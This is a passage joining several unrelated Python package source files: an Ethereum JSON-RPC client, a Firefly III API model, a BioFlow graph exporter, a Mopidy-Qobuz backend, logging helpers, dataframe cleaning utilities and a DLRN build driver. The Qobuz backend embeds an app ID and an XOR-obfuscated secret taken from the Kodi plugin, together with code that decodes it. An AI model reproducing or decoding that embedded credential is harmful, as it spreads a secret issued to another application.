self.port = port
print("{0} {1}".format(host, port))
def request(self, payload):
self.requestCount += 1
url = "http://{0}:{1}".format(self.host, self.port)
headers = {'content-type': 'application/json'}
payload['id'] = self.requestCount
response = requests.post(
url, data=json.dumps(payload), headers=headers).json()
return response
def web3_client_version(self, raw=False):
"""
        Get the web3 client version
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("web3_clientVersion")
result = self.request(payload)
return Helper.result_or_raw(raw, result)
def web3_sha3(self, data, raw=False):
"""
Compute the Keccak-256 of the given data
:param data:
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("web3_sha3")
payload['params'] = [
data
]
result = self.request(payload)
return Helper.result_or_raw(raw, result)
def net_version(self, raw=False):
"""
Get the current network version for the node
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("net_version")
result = self.request(payload)
return Helper.result_or_raw(raw, result)
def net_listening(self, raw=False):
"""
Get if the node is listening for new connections
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("net_listening")
result = self.request(payload)
return Helper.result_or_raw(raw, result)
def net_peer_count(self, raw=False):
"""
Get the current peer count for the node
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("net_peerCount")
result = self.request(payload)
if raw:
return result
else:
return int(result['result'], 16)
def eth_protocol_version(self, raw=False):
"""
Get the node's protocol version
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("eth_protocolVersion")
result = self.request(payload)
return Helper.result_or_raw(raw, result)
def eth_syncing(self, raw=False):
"""
Get if the node is syncing
:param raw:
:return: Returns false if not syncing, object if syncing
"""
payload = Helper.generate_empty_payload("eth_syncing")
result = self.request(payload)
return Helper.result_or_raw(raw, result)
def eth_coinbase(self, raw=False):
"""
Get the node's coinbase
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("eth_coinbase")
result = self.request(payload)
return Helper.result_or_raw(raw, result)
def eth_mining(self, raw=False):
"""
Get if the node is mining
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("eth_mining")
result = self.request(payload)
return Helper.result_or_raw(raw, result)
def eth_hashrate(self, raw=False):
"""
Get the hashrate of the node in hashes per second
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("eth_hashrate")
result = self.request(payload)
return Helper.result_or_raw_quantity(raw, result)
def eth_gas_price(self, raw=False):
"""
Get the network gas price
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("eth_gasPrice")
result = self.request(payload)
return Helper.result_or_raw_quantity(raw, result)
def eth_accounts(self, raw=False):
"""
Get accounts owned by the client
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("eth_accounts")
result = self.request(payload)
return Helper.result_or_raw(raw, result)
def eth_block_number(self, raw=False):
"""
Get the current block number
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("eth_blockNumber")
result = self.request(payload)
return Helper.result_or_raw_quantity(raw, result)
def eth_get_balance(self, address, block_number="latest", raw=False):
"""
Get the balance of the given address in wei
:param address: address to get balance of
:param block_number: integer block number, or the string "latest", "earliest" or "pending"
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("eth_getBalance")
payload['params'] = [
address,
block_number
]
result = self.request(payload)
return Helper.result_or_raw_quantity(raw, result)
def eth_get_storage_at(self, address, position, block_number="latest", raw=False):
"""
Returns the value from a storage position at a given address.
:param address: Address of the storage
:param position: integer of the position in the storage in Ethereum compatible hex string
:param block_number: integer block number, or the string "latest", "earliest" or "pending"
:param raw:
:return:
"""
        # TODO: Support hashmap
payload = Helper.generate_empty_payload("eth_getStorageAt")
payload['params'] = [
address,
position,
block_number
]
result = self.request(payload)
return Helper.result_or_raw(raw, result)
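    # Editor's note on the TODO above (hedged sketch): for a Solidity mapping
    # declared at storage slot p, the entry for key k lives at
    # keccak256(pad32(k) ++ pad32(p)). That position can be computed with
    # web3_sha3 and passed back into eth_get_storage_at, e.g. with `key` and
    # `slot` as zero-padded 64-character hex strings (no 0x prefix):
    #
    #     position = client.web3_sha3("0x" + key + slot)
    #     value = client.eth_get_storage_at(address, position)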
def eth_get_transaction_count(self, address, block_number="latest", raw=False):
"""
Get the number of transactions **sent** from an address
:param address: address to get balance of
:param block_number: integer block number, or the string "latest", "earliest" or "pending"
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("eth_getTransactionCount")
payload['params'] = [
address,
block_number
]
result = self.request(payload)
return Helper.result_or_raw_quantity(raw, result)
def eth_get_block_transaction_count_by_hash(self, block, raw=False):
"""
Get the number of transactions in a block
:param block: hash of the block
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("eth_getBlockTransactionCountByHash")
payload['params'] = [
block
]
result = self.request(payload)
return Helper.result_or_raw_quantity(raw, result)
def eth_get_block_transaction_count_by_number(self, block, raw=False):
"""
Get the number of transactions in a block
:param block: block number
:param raw:
:return:
"""
payload = Helper.generate_empty_payload("eth_getBlockTransactionCountByNumber")
payload['params'] = [
block
]
result = self.request(payload)
return Helper.result_or_raw_quantity(raw, result) | PypiClean |
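# A minimal usage sketch (hypothetical -- the enclosing client class and its
# constructor are defined earlier in this module):
#
#     client = ...  # an instance of the enclosing JSON-RPC client class
#     client.eth_block_number()   # current block height as an int
#     client.eth_gas_price()      # network gas price
#     client.eth_get_balance("0x0000000000000000000000000000000000000000")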
/Firefly%20III%20API%20Python%20Client-1.5.6.post2.tar.gz/Firefly III API Python Client-1.5.6.post2/firefly_iii_client/model/transaction_link_read.py | import re # noqa: F401
import sys # noqa: F401
from firefly_iii_client.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
from ..model_utils import OpenApiModel
from firefly_iii_client.exceptions import ApiAttributeError
def lazy_import():
from firefly_iii_client.model.object_link import ObjectLink
from firefly_iii_client.model.transaction_link import TransactionLink
globals()['ObjectLink'] = ObjectLink
globals()['TransactionLink'] = TransactionLink
class TransactionLinkRead(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and, for var_name, this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and, for var_name, this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'attributes': (TransactionLink,), # noqa: E501
'id': (str,), # noqa: E501
'links': (ObjectLink,), # noqa: E501
'type': (str,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'attributes': 'attributes', # noqa: E501
'id': 'id', # noqa: E501
'links': 'links', # noqa: E501
'type': 'type', # noqa: E501
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, attributes, id, links, type, *args, **kwargs): # noqa: E501
"""TransactionLinkRead - a model defined in OpenAPI
Args:
attributes (TransactionLink):
id (str):
links (ObjectLink):
type (str): Immutable value
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.attributes = attributes
self.id = id
self.links = links
self.type = type
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, attributes, id, links, type, *args, **kwargs): # noqa: E501
"""TransactionLinkRead - a model defined in OpenAPI
Args:
attributes (TransactionLink):
id (str):
links (ObjectLink):
type (str): Immutable value
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.attributes = attributes
self.id = id
self.links = links
self.type = type
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.") | PypiClean |
/BioFlow-0.2.3.tar.gz/BioFlow-0.2.3/bioflow/utils/gdfExportInterface.py | import numpy as np
from scipy.sparse import lil_matrix
from bioflow.main_configs import Dumps
from bioflow.utils.general_utils.high_level_os_io import mkdir_recursive
# TODO: this class needs to be split into the GDF core that does all the work on a matrix rendering
# and filters that filter out the unwanted variables
class GdfExportInterface(object):
"""
An interface allowing the export of the matrix relation object and node characteristics to a
GDF format, compatible with visualization with appropriate tools.
:param target_fname: name of the file to which the GDF file will be written
:param field_names: Names of the different fields for the node description
:param field_types: Types of the different fields for the node description
:param node_properties_dict: dictionary mapping the node labels to outputs
:param min_current: minimal current below which we are not rendering the links anymore
:param index_2_label: Mapping from the indexes of the current matrix lines/columns to the node labels
:param label_2_index: Inverse mapping, from the node labels to the current matrix indexes
:param current_matrix: matrix of currents from which we wish to render the GDF
"""
Authorised_names = ['VARCHAR', 'DOUBLE', 'BOOLEAN']
def __init__(
self,
target_fname,
field_names,
field_types,
node_properties_dict,
min_current,
index_2_label,
label_2_index,
current_matrix,
directed=False):
mkdir_recursive(target_fname)
self.target_file = open(target_fname, 'w')
self.field_types = field_types
self.field_names = field_names
self.node_properties = node_properties_dict
self.Idx2Label = index_2_label
self.Label2Idx = label_2_index
self.current_Matrix = lil_matrix(current_matrix)
# matrix where M[i,j] = current intensity from i to j. Upper triangular; if the current is
# from j to i, the current is negative
# current retrieval for the output should be done by getting all the non-zero terms of
# the current matrix and then filtering out terms/lines that have too little absolute
# current
# rebuilding a new current Matrix and creating a dict to map the relations from the
# previous matrix into a new one.
self.mincurrent = min_current * \
self.current_Matrix[self.current_Matrix.nonzero()].toarray().max()
# minimal current for which we will be performing filtering out of the conductances and
# nodes through which the traffic is below that limit
self.directed = directed
self.verify()
def verify(self):
"""
:raises Exception: "GDF Node declaration is wrong!" - if the length of field names and
field type differ
:raises Exception: "Wrong Types were declared, ...." - if the declared types are not in
the Authorised names
"""
if len(self.field_names) != len(self.field_types):
raise Exception('GDF Node declaration is wrong')
if not set(self.Authorised_names) >= set(self.field_types):
raise Exception(
'Wrong types were declared. please refer to the Doc')
def write_nodedefs(self):
"""
Writes the nodedef header line, built from the field names and field types
"""
accumulator = []
for node_name, node_type in zip(self.field_names, self.field_types):
accumulator.append(node_name + ' ' + node_type)
retstring = ', '.join(accumulator)
retstring = 'nodedef> name VARCHAR, ' + retstring + '\n'
self.target_file.write(retstring)
def write_nodes(self):
"""
Write the nodes with their associated information, skipping nodes whose
traffic falls below the rendering threshold
"""
for nodename, nodeprops in self.node_properties.iteritems():
    if self.mincurrent and float(nodeprops[0]) < self.mincurrent:
        # traffic through this node is below the threshold; skip it
        continue
    self.target_file.write(
        str(nodename) + ', ' + ', '.join(nodeprops) + '\n')
def write_edgedefs(self):
"""
Write the definition for the edges. Right now, the information carried by the edges is
restricted to the current
"""
retstring = 'edgedef> node1 VARCHAR, node2 VARCHAR, weight DOUBLE, directed BOOLEAN\n'
self.target_file.write(retstring)
def write_edges(self):
"""
Writes information about edge connections. This information is pulled from the
conductance matrix.
"""
nz = self.current_Matrix.nonzero()
for i, j in zip(nz[0], nz[1]):
if abs(self.current_Matrix[i, j]) > self.mincurrent:
if self.directed:
write_line = ', '.join([str(self.Idx2Label[i]), str(self.Idx2Label[j]),
str(self.current_Matrix[i, j]), 'true']) + '\n'
else:
write_line = ', '.join([str(self.Idx2Label[i]), str(self.Idx2Label[j]),
str(self.current_Matrix[i, j]), 'false']) + '\n'
self.target_file.write(write_line)
def write(self):
"""
Performs all the writing routines and closes the output file, all at once
"""
self.write_nodedefs()
self.write_nodes()
self.write_edgedefs()
self.write_edges()
self.target_file.close()
if __name__ == "__main__":
pass | PypiClean |
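# A minimal usage sketch (the toy values below are illustrative assumptions,
# not taken from BioFlow's pipelines):
#
#     from scipy.sparse import lil_matrix
#
#     currents = lil_matrix((2, 2))
#     currents[0, 1] = 3.5  # current flowing from node 0 to node 1
#
#     gdf = GdfExportInterface(
#         target_fname='/tmp/example.gdf',
#         field_names=['current', 'legacy_id'],
#         field_types=['DOUBLE', 'VARCHAR'],
#         node_properties_dict={'A': ['3.5', 'id_1'], 'B': ['3.5', 'id_2']},
#         min_current=0.01,
#         index_2_label={0: 'A', 1: 'B'},
#         label_2_index={'A': 0, 'B': 1},
#         current_matrix=currents)
#     gdf.write()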
/Mopidy-Qobuz-0.0.1.tar.gz/Mopidy-Qobuz-0.0.1/mopidy_qobuz/backend.py | from __future__ import unicode_literals
import binascii
import logging
import os
import threading
import pykka
import qobuz
from itertools import cycle
from mopidy import backend, httpclient
from mopidy_qobuz import library, playback, playlists
logger = logging.getLogger(__name__)
class QobuzBackend(pykka.ThreadingActor, backend.Backend):
def __init__(self, config, audio):
super(QobuzBackend, self).__init__()
self._config = config
self._session = None
self.library = library.QobuzLibraryProvider(backend=self)
self.playback = playback.QobuzPlaybackProvider(
audio=audio, backend=self
)
self.playlists = playlists.QobuzPlaylistsProvider(backend=self)
self.uri_schemes = ["qobuz"]
def on_start(self):
self._actor_proxy = self.actor_ref.proxy()
# Kodi
app_id = "285473059"
s3b = "Bg8HAA5XAFBYV15UAlVVBAZYCw0MVwcKUVRaVlpWUQ8="
qobuz.api.register_app(
app_id=app_id, app_secret=self.get_s4(app_id, s3b)
)
self._session = qobuz.User(
self._config["qobuz"]["username"],
self._config["qobuz"]["password"],
)
def get_s4(self, app_id, s3b):
"""Return the obfuscated secret.
This is based on the way the Kodi-plugin handles the secret.
While this is just a useless security through obscurity measurement and
could just be calculated once, this functions allows to store the secret
in a not plain text format. Which might be a requirement by Qobuz.
Until the API-team feels like answering any of the mails, this uses the
same obfuscation as Kodi.
Parameters
----------
app_id: str
The ID of the APP, issued by [email protected]
s3b: str
Secret encoded for security through obscurity.
"""
s3s = binascii.a2b_base64(s3b)
try:
return "".join(
chr(x ^ ord(y)) for (x, y) in zip(s3s, cycle(app_id))
)
except TypeError:
# python2
return "".join(
chr(ord(x) ^ ord(y)) for (x, y) in zip(s3s, cycle(app_id))
) | PypiClean |
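# A quick round-trip sketch of the obfuscation scheme (toy values, not the
# real Qobuz credentials):
#
#     import binascii
#     from itertools import cycle
#
#     app_id = "12345"
#     secret = "s3cr3t"
#     # obfuscate: XOR the secret with the cycled app_id, then base64-encode
#     s3b = binascii.b2a_base64(bytes(
#         ord(x) ^ ord(y) for (x, y) in zip(secret, cycle(app_id))))
#     # backend.get_s4(app_id, s3b) reverses the XOR and yields "s3cr3t"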
/citus-0.0.3-py3-none-any.whl/citus/logging.py | import logging
import sys
import typing as t
from werkzeug.local import LocalProxy
from .globals import request
if t.TYPE_CHECKING:
from .app import API
@LocalProxy
def wsgi_errors_stream() -> t.TextIO:
"""Find the most appropriate error stream for the application. If a request
is active, log to ``wsgi.errors``, otherwise use ``sys.stderr``.
If you configure your own :class:`logging.StreamHandler`, you may want to
use this for the stream. If you are using file or dict configuration and
can't import this directly, you can refer to it as
``ext://citus.logging.wsgi_errors_stream``.
"""
return request.environ["wsgi.errors"] if request else sys.stderr
def has_level_handler(logger: logging.Logger) -> bool:
"""Check if there is a handler in the logging chain that will handle the
given logger's :meth:`effective level <~logging.Logger.getEffectiveLevel>`.
"""
level = logger.getEffectiveLevel()
current = logger
while current:
if any(handler.level <= level for handler in current.handlers):
return True
if not current.propagate:
break
current = current.parent # type: ignore
return False
#: Log messages to :func:`~flask.logging.wsgi_errors_stream` with the format
#: ``[%(asctime)s] %(levelname)s in %(module)s: %(message)s``.
default_handler = logging.StreamHandler(wsgi_errors_stream) # type: ignore
default_handler.setFormatter(
logging.Formatter("[%(asctime)s] %(levelname)s in %(module)s: %(message)s")
)
def create_logger(app: "API") -> logging.Logger:
"""Get the Flask app's logger and configure it if needed.
The logger name will be the same as
:attr:`app.import_name <flask.Flask.name>`.
When :attr:`~flask.Flask.debug` is enabled, set the logger level to
:data:`logging.DEBUG` if it is not set.
If there is no handler for the logger's effective level, add a
:class:`~logging.StreamHandler` for
:func:`~flask.logging.wsgi_errors_stream` with a basic format.
"""
logger = logging.getLogger(app.name)
if app.debug and not logger.level:
logger.setLevel(logging.DEBUG)
if not has_level_handler(logger):
logger.addHandler(default_handler)
return logger | PypiClean |
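# A small self-contained sketch of how has_level_handler walks the logger
# chain (stdlib logging only; assumes a fresh interpreter with no prior
# logging configuration):
#
#     import logging
#
#     parent = logging.getLogger("demo")
#     child = logging.getLogger("demo.child")
#     assert not has_level_handler(child)  # no handler anywhere in the chain
#     parent.addHandler(logging.StreamHandler())  # NOTSET level handles all
#     assert has_level_handler(child)      # found on "demo" via propagation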
/ML-Navigator-0.0.32.tar.gz/ML-Navigator-0.0.32/preprocessing/data_clean.py | import logging
import os
import pandas as pd
logger = logging.getLogger(__name__)
formatting = (
"%(asctime)s: %(levelname)s: File:%(filename)s Function:%(funcName)s Line:%(lineno)d "
"message:%(message)s"
)
logging.basicConfig(
filename=os.path.join(os.path.dirname(os.path.dirname(__file__)), "logs/logs.log"),
level=logging.INFO,
format=formatting,
)
def drop_corr_columns(dataframe: pd.DataFrame, drop_columns: bool = True,
print_columns: bool = True, threshold: float = 0.98) -> pd.DataFrame:
""" Correlated columns eliminator
The function drops correlated columns and keeps only one of them. Usually removing highly correlated columns
improves the model's quality. The task of this function is first to print the list of the most correlated
columns and then remove them by threshold. For more information, please refer to the pandas.DataFrame.corr description:
https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.corr.html
:param pd.DataFrame dataframe: Pandas dataframe which contains the dataset e.g. train_dataframe.
:param bool drop_columns: If true, all correlated columns will be dropped but one.
:param bool print_columns: If True, information about the correlated columns will be printed to the console.
:param float threshold: A value between 0 and 1. If the correlation between two columns is larger than this
value, they are considered highly correlated. If drop_columns is True, one of those columns will be dropped. The
recommended value of the `threshold` is in [0.7 ... 1].
:return:
dataframe: A pandas dataframe which contains the dataset after dropping the correlated columns if `drop_columns = True`. Otherwise, the same input dataframe will be returned.
:example:
For checking correlated columns:
>>> dataframe = drop_corr_columns(dataframe, drop_columns=False, print_columns=True, threshold=0.85)
"""
# 1. calculation
logger.info("Calculating the correlation matrix")
correlation_coefficients = dataframe.corr()
# 2. report
corr_fields_list = []
print(f"Columns with correlations more than {str(threshold)} :")
for i in correlation_coefficients:
for j in correlation_coefficients.index[correlation_coefficients[i] >= threshold]:
if i != j and j not in corr_fields_list:
corr_fields_list.append(j)
logger.info("Report information if required")
if print_columns:
logger.debug(f"print_columns = {print_columns}: Information should be reported")
print(
f"{i}-->{j}: r^2={correlation_coefficients[i][correlation_coefficients.index == j].values[0]}"
)
# 3. dropping
logger.info("Dropping high correlated columns if required")
if drop_columns:
logger.debug(f"drop_columns = {drop_columns}: Columns should be dropped")
print(f"{dataframe.shape[1]} columns total")
dataframe = dataframe.drop(corr_fields_list, 1)
print(f"{dataframe.shape[1]} columns left")
return dataframe
def drop_const_columns(dataframe: pd.DataFrame, drop_columns: bool = True, print_columns: bool = True) -> pd.DataFrame:
""" Constant value columns eliminator
This function drops columns that contain constant values. Usually removing constant columns improves the
model's quality. The task of this function is first to print the list of constant columns and then drop them.
:param pd.DataFrame dataframe: A pandas dataframe that contain the dataset e.g. train_dataframe
:param bool drop_columns: If true, the columns that contain constant values along all the rows will be dropped.
:param bool print_columns: If true, information about the columns that contain constant values will be printed to the console
:return:
dataframe: A pandas dataframe that contains the dataset after dropping the the columns that contain
constant values if `drop_columns = True`
:example:
For checking the columns which have constant value:
>>> dataframe = drop_const_columns(dataframe, drop_columns=False, print_columns=True)
"""
# 1. report
single_value_cols = []
for col in dataframe.columns:
unique_count = dataframe[col].nunique()
if unique_count < 2:
single_value_cols.append(col)
logger.info("Calculating the correlation matrix")
if print_columns:
logger.debug(f"print_columns = {print_columns}: Information should be reported")
print(col, unique_count)
print(f"Constant columns count: {len(single_value_cols)}")
# 2. dropping
logger.info("Dropping high correlated columns if required")
if drop_columns:
logger.debug(f"drop_columns = {drop_columns}: Columns should be dropped")
print(f"{dataframe.shape[1]} columns total")
dataframe = dataframe.drop(single_value_cols, 1)
print(f"{dataframe.shape[1]} columns left")
return dataframe | PypiClean |
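# A minimal end-to-end sketch (toy data; assumes pandas is available):
#
#     import pandas as pd
#
#     df = pd.DataFrame({
#         'a': [1, 2, 3, 4],
#         'b': [2, 4, 6, 8],   # perfectly correlated with 'a'
#         'c': [7, 7, 7, 7],   # constant column
#     })
#     df = drop_corr_columns(df, drop_columns=True, threshold=0.98)
#     df = drop_const_columns(df, drop_columns=True)
#     # one of 'a'/'b' has been dropped, and 'c' is gone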
/ClueDojo-1.4.3-1.tar.gz/ClueDojo-1.4.3-1/src/cluedojo/static/dojo/nls/ja/colors.js | ({"lightsteelblue":"ライト・スチール・ブルー","orangered":"オレンジ・レッド","midnightblue":"ミッドナイト・ブルー","cadetblue":"くすんだ青","seashell":"シーシェル","slategrey":"スレート・グレイ","coral":"珊瑚","darkturquoise":"ダーク・ターコイズ","antiquewhite":"アンティーク・ホワイト","mediumspringgreen":"ミディアム・スプリング・グリーン","salmon":"サーモン","darkgrey":"ダーク・グレイ","ivory":"アイボリー","greenyellow":"緑黄色","mistyrose":"ミスティ・ローズ","lightsalmon":"ライト・サーモン","silver":"銀","dimgrey":"くすんだグレイ","orange":"オレンジ","white":"白","navajowhite":"ナバホ・ホワイト","royalblue":"藤色","deeppink":"濃いピンク","lime":"ライム","oldlace":"オールド・レイス","chartreuse":"淡黄緑","darkcyan":"ダーク・シアン・ブルー","yellow":"黄","linen":"亜麻色","olive":"オリーブ","gold":"金","lawngreen":"ローン・グリーン","lightyellow":"ライト・イエロー","tan":"茶褐色","darkviolet":"ダーク・バイオレット","lightslategrey":"ライト・スレート・グレイ","grey":"グレイ","darkkhaki":"ダーク・カーキー","green":"緑","deepskyblue":"濃い空色","aqua":"アクア","sienna":"黄褐色","mintcream":"ミント・クリーム","rosybrown":"ロージー・ブラウン","mediumslateblue":"ミディアム・スレート・ブルー","magenta":"赤紫","lightseagreen":"ライト・シー・グリーン","cyan":"シアン・ブルー","olivedrab":"濃黄緑","darkgoldenrod":"ダーク・ゴールデン・ロッド","slateblue":"スレート・ブルー","mediumaquamarine":"ミディアム・アクアマリーン","lavender":"ラベンダー","mediumseagreen":"ミディアム・シー・グリーン","maroon":"えび茶","darkslategray":"ダーク・スレート・グレイ","mediumturquoise":"ミディアム・ターコイズ","ghostwhite":"ゴースト・ホワイト","darkblue":"ダーク・ブルー","mediumvioletred":"ミディアム・バイオレット・レッド","brown":"茶","lightgray":"ライト・グレイ","sandybrown":"砂褐色","pink":"ピンク","firebrick":"赤煉瓦色","indigo":"藍色","snow":"雪色","darkorchid":"ダーク・オーキッド","turquoise":"ターコイズ","chocolate":"チョコレート","springgreen":"スプリング・グリーン","moccasin":"モカシン","navy":"濃紺","lemonchiffon":"レモン・シフォン","teal":"ティール","floralwhite":"フローラル・ホワイト","cornflowerblue":"コーンフラワー・ブルー","paleturquoise":"ペイル・ターコイズ","purple":"紫","gainsboro":"ゲインズボーロ","plum":"深紫","red":"赤","blue":"青","forestgreen":"フォレスト・グリーン","darkgreen":"ダーク・グリーン","honeydew":"ハニーデュー","darkseagreen":"ダーク・シー・グリーン","lightcoral":"ライト・コーラル","palevioletred":"ペイル・バイオレット・レッド","mediumpurple":"ミディアム・パープル","saddlebrown":"サドル・ブラウン","darkmagenta":"ダーク・マジェンタ","thistle":"シスル","whitesmoke":"ホワイト・スモーク","wheat":"小麦色","violet":"すみれ色","lightskyblue":"ライト・スカイ・ブルー","goldenrod":"ゴールデン・ロッド","mediumblue":"ミディアム・ブルー","skyblue":"スカイ・ブルー","crimson":"深紅","darksalmon":"ダーク・サーモン","darkred":"ダーク・レッド","darkslategrey":"ダーク・スレート・グレイ","peru":"ペルー","lightgrey":"ライト・グレイ","lightgoldenrodyellow":"ライト・ゴールデン・ロッド・イエロー","blanchedalmond":"皮なしアーモンド","aliceblue":"アリス・ブルー","bisque":"ビスク","slategray":"スレート・グレイ","palegoldenrod":"ペイル・ゴールデン・ロッド","darkorange":"ダーク・オレンジ","aquamarine":"碧緑","lightgreen":"ライト・グリーン","burlywood":"バーリーウッド","dodgerblue":"ドッジャー・ブルー","darkgray":"ダーク・グレイ","lightcyan":"ライト・シアン","powderblue":"淡青","blueviolet":"青紫","orchid":"薄紫","dimgray":"くすんだグレイ","beige":"ベージュ","fuchsia":"紫紅色","lavenderblush":"ラベンダー・ブラッシ","hotpink":"ホット・ピンク","steelblue":"鋼色","tomato":"トマト色","lightpink":"ライト・ピンク","limegreen":"ライム・グリーン","indianred":"インディアン・レッド","papayawhip":"パパイア・ホイップ","lightslategray":"ライト・スレート・グレイ","gray":"グレイ","mediumorchid":"ミディアム・オーキッド","cornsilk":"コーンシルク","black":"黒","seagreen":"シー・グリーン","darkslateblue":"ダーク・スレート・ブルー","khaki":"カーキー","lightblue":"ライト・ブルー","palegreen":"ペイル・グリーン","azure":"薄い空色","peachpuff":"ピーチ・パフ","darkolivegreen":"ダーク・オリーブ・グリーン","yellowgreen":"黄緑"}) | PypiClean |
/DLRN-0.26.1.tar.gz/DLRN-0.26.1/dlrn/drivers/mockdriver.py |
# BuildRPMDriver derived classes expose the following methods:
#
# build_package(). This method will perform the actual package build using
# the driver-specific approach.
from dlrn.config import setup_logging
from dlrn.drivers.buildrpm import BuildRPMDriver
import io
import logging
import os
import re
import sh
logger = logging.getLogger("dlrn-build-mock")
class MockBuildDriver(BuildRPMDriver):
DRIVER_CONFIG = {
'mockbuild_driver': {
'install_after_build': {'type': 'boolean', 'default': True},
},
}
# We are using this method to "tee" mock output to mock.log and stdout
def _process_mock_output(self, line):
if self.verbose_build:
logger.info(line[:-1])
self.mock_fp.write(line)
def __init__(self, *args, **kwargs):
super(MockBuildDriver, self).__init__(*args, **kwargs)
self.verbose_build = False
setup_logging()
def build_package(self, **kwargs):
"""Valid parameters:
:param output_directory: directory where the SRPM is located,
and the built packages will be.
:param additional_mock_opts: string with additional options to
be passed to mock.
"""
output_dir = kwargs.get('output_directory')
